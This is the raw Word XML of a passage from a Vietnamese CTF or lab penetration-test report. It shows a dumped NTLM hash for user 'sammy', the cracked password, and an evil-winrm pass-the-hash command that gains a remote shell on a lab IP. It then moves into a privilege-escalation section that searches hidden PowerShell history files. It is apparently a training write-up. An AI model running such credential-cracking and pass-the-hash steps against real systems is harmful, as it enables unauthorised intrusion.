    <w:p w14:paraId="21157ABC" w14:textId="544C520D" w:rsidR="007E27A9" w:rsidRDefault="007E27A9" w:rsidP="003934B8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E27A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>sammy:1001:aad3b435b51404eeaad3b435b51404ee:acb6c481b437b1239fe4746a87b76c07:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E72A3C" w14:textId="2A7A4C07" w:rsidR="008F5CC4" w:rsidRPr="00D87488" w:rsidRDefault="008F5CC4" w:rsidP="003934B8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Thực hiện crask</w:t>
      </w:r>
      <w:r w:rsidR="00D87488">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> NTLM ta được pass là </w:t>
      </w:r>
      <w:r w:rsidR="00D87488" w:rsidRPr="00D87488">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
        </w:rPr>
        <w:t>iluvstarbucks94</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDD54E3" w14:textId="3A48ACE9" w:rsidR="00C26F69" w:rsidRDefault="00D87488" w:rsidP="003934B8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="111E2E6E" wp14:editId="5E0F2F34">
            <wp:extent cx="5943600" cy="33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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="527A144E" w14:textId="77777777" w:rsidR="00D87488" w:rsidRDefault="00D87488" w:rsidP="003934B8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="682B2E18" w14:textId="52CEBF4F" w:rsidR="00D87488" w:rsidRDefault="00E303BA" w:rsidP="003934B8">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Tuy nhiên server không bật ssh, thế nên phải sử dụng tool khác để remote tới máy này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F586127" w14:textId="77777777" w:rsidR="0045796E" w:rsidRDefault="0045796E" w:rsidP="003934B8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="373E581C" w14:textId="43D8EDDF" w:rsidR="0045796E" w:rsidRDefault="0045796E" w:rsidP="003934B8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045796E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>evil-winrm -i 192.168.19.116 -u sammy -H acb6c481b437b1239fe4746a87b76c07</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479B8F44" w14:textId="2BD14E0B" w:rsidR="00E303BA" w:rsidRPr="008114E0" w:rsidRDefault="00F2612F" w:rsidP="003934B8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17ABBC36" wp14:editId="6B06736E">
            <wp:extent cx="5943600" cy="24149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1B58ADC6" w14:textId="53E9923C" w:rsidR="00B37A80" w:rsidRDefault="00B37A80" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Hình ảnh minh chứng</w:t>
      </w:r>
      <w:r w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340F4598" w14:textId="188908EE" w:rsidR="00B37A80" w:rsidRDefault="00B37A80" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C366A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>[Hình ảnh chứa nội dung: tên user đã bị kiểm soát (whoami), địa chỉ IP (ipconfig)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1476A72B" w14:textId="6DA2C047" w:rsidR="00635EDC" w:rsidRPr="00C366A5" w:rsidRDefault="00635EDC" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17B76785" wp14:editId="55AA69B3">
            <wp:extent cx="5943600" cy="2319655"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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14:paraId="48EDA8B1" w14:textId="39BE2699" w:rsidR="00B37A80" w:rsidRDefault="00B37A80" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Nội dung tập tin Local.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606D6B49" w14:textId="77777777" w:rsidR="00B37A80" w:rsidRDefault="00B37A80" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C366A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>[Hình ảnh chứa nội dung: địa chỉ IP (ipconfig)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>, nội dung tập tin local.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00C366A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57651466" w14:textId="2A5F721B" w:rsidR="00102B01" w:rsidRDefault="00102B01" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AA93A5F" wp14:editId="054B8398">
            <wp:extent cx="5943600" cy="588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14:paraId="6160FD3D" w14:textId="50F7ED55" w:rsidR="00102B01" w:rsidRDefault="00102B01" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00102B01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>flag{th4n_d1eu_da1_b1p}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B9B951" w14:textId="77777777" w:rsidR="00B37A80" w:rsidRDefault="00B37A80" w:rsidP="00B37A80">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="200" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Leo thang đặc quyền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5007448C" w14:textId="5C36F1D0" w:rsidR="00B37A80" w:rsidRPr="00B6701C" w:rsidRDefault="00B37A80" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Lỗ hổng đã khai thác</w:t>
      </w:r>
      <w:r w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="3ADEB52F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="457E3F03" w:rsidRPr="3ADEB52F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidR="457E3F03" w:rsidRPr="5D4418E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773AFA3F" w14:textId="77777777" w:rsidR="00B37A80" w:rsidRDefault="00B37A80" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Cách thức khai thác</w:t>
      </w:r>
      <w:r w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>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45"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B37A80" w14:paraId="3400D9F7" w14:textId="77777777" w:rsidTr="003A380C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9345" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="2C9F3321" w14:textId="77777777" w:rsidR="00B37A80" w:rsidRDefault="00B37A80" w:rsidP="003A380C">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>[Lệnh tấn công/mã khai thác]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="727956B9" w14:textId="77777777" w:rsidR="00B37A80" w:rsidRPr="00691796" w:rsidRDefault="00B37A80" w:rsidP="003A380C">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t xml:space="preserve">[màu </w:t>
            </w:r>
            <w:r w:rsidRPr="00D11294">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>đỏ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t xml:space="preserve"> nếu có thay đổi trong mã khai thác]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FB69BCB" w14:textId="77777777" w:rsidR="00B37A80" w:rsidRDefault="00B37A80" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007091B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>[Step-by-step cách thức để có quyền truy cập vào máy chủ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA11028" w14:textId="693C4814" w:rsidR="003C51D3" w:rsidRDefault="003C51D3" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C51D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48A61E7A" wp14:editId="1976DB64">
            <wp:extent cx="5943600" cy="227774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42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2277745"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BC506E" w14:textId="22689B1F" w:rsidR="003C51D3" w:rsidRDefault="003C51D3" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Quay lại ổ đĩa C để tiến hành khai thác từ các folder đã lấy được, tuy nhiên nó ít hơn so với các folder đã mount được ở </w:t>
      </w:r>
      <w:r w:rsidR="00BF45F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>/mnt/vhd</w:t>
      </w:r>
      <w:r w:rsidR="00BF45F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2213A857" wp14:editId="1E0405F4">
            <wp:extent cx="5943600" cy="28898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6207BAA2" w14:textId="63A29802" w:rsidR="00BF45F2" w:rsidRDefault="00BF45F2" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Thực hiện với cú pháp ls -hidden để kiểm tra, thì thấy có xuất hiện thêm folder Transcripts, đây là thư mục khả nghi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BBA0D2" w14:textId="2D2CCA5D" w:rsidR="00BF45F2" w:rsidRDefault="00174096" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A5C1359" wp14:editId="2B90B8C5">
            <wp:extent cx="5943600" cy="3639820"/>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1624F8B3" w14:textId="570702B1" w:rsidR="00174096" w:rsidRDefault="00562E12" w:rsidP="34BCAC5E">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="34BCAC5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Bên trong thư folder Transcript lại chứ</w:t>
      </w:r>
      <w:r w:rsidR="443D6C94" w:rsidRPr="34BCAC5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="34BCAC5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder hidden khác =))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780178BF" w14:textId="7BECF969" w:rsidR="00562E12" w:rsidRDefault="00EA079E" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D291DB7" wp14:editId="1C204CE3">
            <wp:extent cx="5943600" cy="4253865"/>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0D5D841F" w14:textId="53BC7937" w:rsidR="00EA079E" w:rsidRDefault="00EA079E" w:rsidP="34BCAC5E">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="34BCAC5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Trong folder bị hidden ch</w:t>
      </w:r>
      <w:r w:rsidR="6805FCDC" w:rsidRPr="34BCAC5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>ứ</w:t>
      </w:r>
      <w:r w:rsidRPr="34BCAC5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">a fake flag và 1 file bị hidden </w:t>
      </w:r>
      <w:r w:rsidR="00D01AC2" w:rsidRPr="34BCAC5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>=))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C422FF" w14:textId="5863B35F" w:rsidR="00D01AC2" w:rsidRDefault="006B5297" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Cat file này ra ta đ</w:t>
      </w:r>
      <w:r w:rsidR="009C1716">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">ọc được khá nhiều thông tin, nhưng cụ thể thì đây chính là file lịch sử của powershell bên máy </w:t>
      </w:r>
      <w:r w:rsidR="009457A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>win.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B21CF26" w14:textId="7B6D813A" w:rsidR="009457A6" w:rsidRDefault="009457A6" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33037612" wp14:editId="7ECE8178">
            <wp:extent cx="5943600" cy="230314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73AD0E1E" w14:textId="1B45CD8D" w:rsidR="009457A6" w:rsidRDefault="009457A6" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Có thông tin cuối cùng thì john là tài khoản admin, kéo lên trên để điều tra tiếp</w:t>
      </w:r>
      <w:r w:rsidR="13DBBD28" w:rsidRPr="5C9C7021">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="13DBBD28" w:rsidRPr="0D82C5A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">và phát hiện một đoạn code với các biến $foo và </w:t>
      </w:r>
      <w:r w:rsidR="13DBBD28" w:rsidRPr="3412D55E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>$fO0 khả nghi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F25F9FA" w14:textId="3C83A070" w:rsidR="3412D55E" w:rsidRDefault="009457A6" w:rsidP="3412D55E">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
